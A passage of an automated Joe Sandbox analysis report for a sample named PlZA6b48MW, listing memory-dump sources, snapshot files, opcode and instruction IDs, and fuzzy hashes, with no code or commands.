                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5721c9f1a3cb750c20ebf043d4c0f467e5be4bc642b604ea9e1c27f8b2e4962
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction ID: 891bfe6b1fa4d262e253a58a1efd8a9051e8049aabdf0bb15959644a91ea2024
                                                                            • Opcode Fuzzy Hash: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction Fuzzy Hash: 15F0623154F3C9AFD7229BB088A14AD7FA4EF43220B1A01EAD485C70A2D52C5746C762
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 559137e37e5985a297bed6561e41bf909d6f6bbca97dfa82e3f265f2b3d08e16
                                                                            • Instruction ID: ca93f2959aa2348824aa106be06ec8f829573f2f35f2c4383d1024bd3b2b0ae1
                                                                            • Opcode Fuzzy Hash: 559137e37e5985a297bed6561e41bf909d6f6bbca97dfa82e3f265f2b3d08e16
                                                                            • Instruction Fuzzy Hash: EC011734A08E1DCFCB65DF54C495AA973B1FB5C300F5105A9D44ED7260DB34AA45CF81
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: fbd84bb240e6ae2ac9753cf1f42eaf4c11986d7e39ea946345689bbb6a2b7331
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: EA013630E5DD1E8BEB74EB58CC606F873A1EF58311F1601B9D45ED32A2CD786AC18A00
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction ID: 09986c0eb061ce59d61a45bfc836a8dcf1feb46916f9dd4b75226c717d720ff9
                                                                            • Opcode Fuzzy Hash: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction Fuzzy Hash: 43F02021B0DBC80FC729962A88A5021BFE1DF9B50130A12EFC086C72A3DC48AC868345
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13e9878ab42f587fc5a3bae8e0e98b0ff69d30e0812fd8b1931c04646003df65
                                                                            • Instruction ID: c28be2b0679ba6c059d2e556964bf6c48648a9fa0365348baa57147361ede310
                                                                            • Opcode Fuzzy Hash: 13e9878ab42f587fc5a3bae8e0e98b0ff69d30e0812fd8b1931c04646003df65
                                                                            • Instruction Fuzzy Hash: 21F04F70B1691E8BEF68DB88D864ABEB7B1FF54315F40463AD416D32A4DF746A018780
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c32df264843ac0bcdabc130060458cb5e4b4bd519d7c833661e8c1ae6d12baf3
                                                                            • Instruction ID: ccc9bd2722999464784289349383bcf51fe2d14272ec7da04c50aba9436ede76
                                                                            • Opcode Fuzzy Hash: c32df264843ac0bcdabc130060458cb5e4b4bd519d7c833661e8c1ae6d12baf3
                                                                            • Instruction Fuzzy Hash: ADF0B410B0F60F8AFB3556B095B11BC2610DF41350F62017AE80EC75E1CD29774553A2
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76b81fdce47ff64edbe0a1634efa5f1a4a3eddc49854e23ca9c11aa8e935cd64
                                                                            • Instruction ID: b9e5b5c48b04b450519c08c136d6a94f4b61ae6d4ff30d25b2faca5d35ac1ff7
                                                                            • Opcode Fuzzy Hash: 76b81fdce47ff64edbe0a1634efa5f1a4a3eddc49854e23ca9c11aa8e935cd64
                                                                            • Instruction Fuzzy Hash: ECF05430B0D95E4BEE35AB8894606BA3291EF49314F1645B9D41ED31F7DE28AA414580
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c37c731b9166a2e4eb8a125ffbd3245e14d6e41d3a900bb9c1fe67af98c5b637
                                                                            • Instruction ID: a084b1cb4f58d5b86f28be9a7009ca07bb31c4a54a6251fe8cd2c2c9963db4a5
                                                                            • Opcode Fuzzy Hash: c37c731b9166a2e4eb8a125ffbd3245e14d6e41d3a900bb9c1fe67af98c5b637
                                                                            • Instruction Fuzzy Hash: 7EF0E950B0591F5FE6D8EB6884AA7B432D5EF5C340F040135E40CC3196DE2828414F81
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba6d858317dfcaf6428f89d24784d6269108512cad9d645248c843e3b6bebaff
                                                                            • Instruction ID: f00cf6a8694dd9e70e22c32d5f6153f7eba7cd396e42185c2b1ab48a4d4ef270
                                                                            • Opcode Fuzzy Hash: ba6d858317dfcaf6428f89d24784d6269108512cad9d645248c843e3b6bebaff
                                                                            • Instruction Fuzzy Hash: 4EF03011B1F85F4EE77961F818B407C1982CB84250B5A097AEC4BCB2F2ED4C7E5253D5
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 55ea1de46978a315c23d1ef5c9cb6f94c92773047b326fcd745ed8730acd68c2
                                                                            • Instruction ID: 31d5ccb54689d68204adcf6b08e1d8dfc6cc9ce7a620948cd86902c81459ace1
                                                                            • Opcode Fuzzy Hash: 55ea1de46978a315c23d1ef5c9cb6f94c92773047b326fcd745ed8730acd68c2
                                                                            • Instruction Fuzzy Hash: DFF0B431F48D3E8FE7A4EBB4809526DB292EB98301F124571D009C32E5DE786A424FC0
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction ID: 358176d80678121ad95a70a4e2877c1a40445b8a28777bece13f6e64a99af6c7
                                                                            • Opcode Fuzzy Hash: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction Fuzzy Hash: 2CE03902B2F80F4AEB7861F814B04BC0042DB88E55F560135E40AC72E6EC486A4513D5
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
                                                                            • Instruction ID: e28ce4173a8e412c5bea0b82bd9e50c8deab70beb668483cf558c0399b989dd2
                                                                            • Opcode Fuzzy Hash: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
                                                                            • Instruction Fuzzy Hash: 5DD02B30760F0C074B2CA52E6445471B3D5C79E206344427E945BC3394DC50EC8247C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2465e01ea4ac97ab3e2de273fdc5145cb18f02fa69729f289504ed41e38a266
                                                                            • Instruction ID: c70246ddd5040e574de049dd74fc413e3ba539c874c4913a7625ba8751b46824
                                                                            • Opcode Fuzzy Hash: a2465e01ea4ac97ab3e2de273fdc5145cb18f02fa69729f289504ed41e38a266
                                                                            • Instruction Fuzzy Hash: 6FE01A2594F7C04FC70B9B3588A88557F60AE6721174A41EBC085CF2F3EA19D94AC752
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8649a965de4da12c5528bc2c4cdc8f90d9e9034a07af31b724d9d83874f3a925
                                                                            • Instruction ID: 5f4b97b0460cc3ccd498a3c324c62b1b5f24bbf6e6054637811685f2a3b88d92
                                                                            • Opcode Fuzzy Hash: 8649a965de4da12c5528bc2c4cdc8f90d9e9034a07af31b724d9d83874f3a925
                                                                            • Instruction Fuzzy Hash: 27D05E30B10D0D4B8B1CA63D886C470B3D1E7A9202794526A940AC22A5ED25ECC5CB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction ID: bc9c38c068a0e8f7ba24b4741a0f10bfe412cb51eac0928afce2039f627f3970
                                                                            • Opcode Fuzzy Hash: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction Fuzzy Hash: 60B01240D6785E02D92833F619530B470005B4C110FC710B5F40C40191984E13E81246
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction ID: e171a0cce2bcaf2be9be95829a1135e93d0544488e58ba4dc171a41986d72666
                                                                            • Opcode Fuzzy Hash: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction Fuzzy Hash: FBB01210DCB80F03CE187EFBADD60A031109F4C308FCA1074E80C40156D84D21F50366
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: 105df88bc064afe158920e2b52b50a2a3bd25cc092415d7a1fa889fc1ff5f02b
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: C6B02200EAA80C03E330ABB088202BE32000F0C208F0B80BA802AA3083CE382A020A00
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 7c69805296b747c8bb6619effc5133634486393f796e516f843f39d7a1b03565
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 8FB01204D7BC0E02E42433F50B5A06470405B4D510FD21470D41940095985F1AA40182
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: bb31b72b98842f8e3b33be80a82a97bc21048ba867448af131269b9e260de9e6
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: 98B01200D67C0F02E42433FB0C52064B0446F8C200FCB0170D42D501A1A85E12950282
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-1300261669